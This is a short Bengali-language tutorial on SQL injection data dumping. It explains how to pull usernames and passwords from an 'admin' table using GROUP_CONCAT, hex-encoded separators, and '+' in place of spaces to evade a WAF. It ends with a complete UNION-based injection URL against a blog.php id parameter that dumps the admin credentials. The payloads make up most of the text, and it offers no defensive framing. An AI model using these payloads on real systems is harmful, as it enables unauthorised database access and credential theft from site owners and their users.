ডেটা ডাম্প

1. সিলেক্ট কিভাবে কাজ করেঃ
2.  
3. SELECT username FROM admin
4. এর মাধ্যমে আমরা যেটা চাইছি যে, 'admin' টেবিল থেকে 'username' কলামের ডেটা।
5. অর্থাৎ, SELECT এর পর সাধারণত কলাম নেম থাকে আর FROM এর পর সাধারণত টেবিল নেম।
6.  
7. এখন যদি আমরা admin টেবিল থেকে username আর password চাই তবে?
8. SELECT GROUP_CONCAT(username, password) FROM admin
9.  
10. output:
11. admin123456,partho33445566,rasel^76jksdj
12.  
13. আউটপুটে আমরা দেখলাম তিনটি রেজাল্ট।
14. ১ম টি username: admin & password: 123456
15. ২য় টি username: partho & password: 33445566
16. ৩য় টি username: rasel & password: ^76jksdj
17.  
18. এখানে সমস্যা হল ইউসারনেম আর পাসওয়ার্ড আলাদা করা কঠিন। আমরা চাই দুইটার মাথে == প্রতীকটি ব্যবহার করবো।
19. SELECT GROUP_CONCAT(username, ==, password) FROM admin
20. কিন্তু এভাবে কাজ করবে না। '==' এর HEX Encoding হোল 3d3d
21. যেহেতু HEX Encoding তাই শুরুতে 0x যুক্ত করতে হবে
22. অর্থাৎ,
23. SELECT GROUP_CONCAT(username, 0x3d3d, password) FROM admin
24.  
25. output:
26. admin==123456,partho==33445566,rasel==^76jksdj
27.  
28. এখনো পুরোপুরি পারফেক্ট না। রেজাল্ট গুলো নিচে নিচে আসলে ভালো হয়। HTML এর <br> স্ট্যাট্মেন্ট দিয়ে এটা করা যাবে।
29. <br> এর HEX Encoding হল 0x3c62723e
30. যেহেতু প্রতিটি রেজাল্ট কে আলাদা করবে তাই এভাবে লিখতে হবে
31. SELECT GROUP_CONCAT(username,0x3d3d,password SEPARATOR 0x3c62723e) FROM admin
32. নোটঃ SEPARATOR এর আগে পরে কমা হবে না।
33.  
34. অনেক সময় WAF এর কারনে স্পেস(" ") ব্লক করা থাকে। তাই পরবর্তী সব এক্সামপল " " এর বদলে + দিয়ে করা হবে
35. তাই ফাইনাল স্ট্যাট্মেন্ট
36. SELECT+GROUP_CONCAT(username,0x3d3d,password+SEPARATOR+0x3c62723e)+FROM+admin
37.  
38. যেমন ইউনিয়ন সিলেক্ট করার পর যদি ২ নাম্বার টা ভালনারেবল হয়
39. example.com/blog.php?id=5+UNION+SELECT+1,2,3,4,5,6,7--
40. তাহলে এভাবে দিলেই কাজ করবে, শুধু ২ এর বদলে () এর মধ্যে কোড
41. example.com/blog.php?id=5+UNION+SELECT+1,(SELECT+GROUP_CONCAT(username,0x3d3d,password+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7--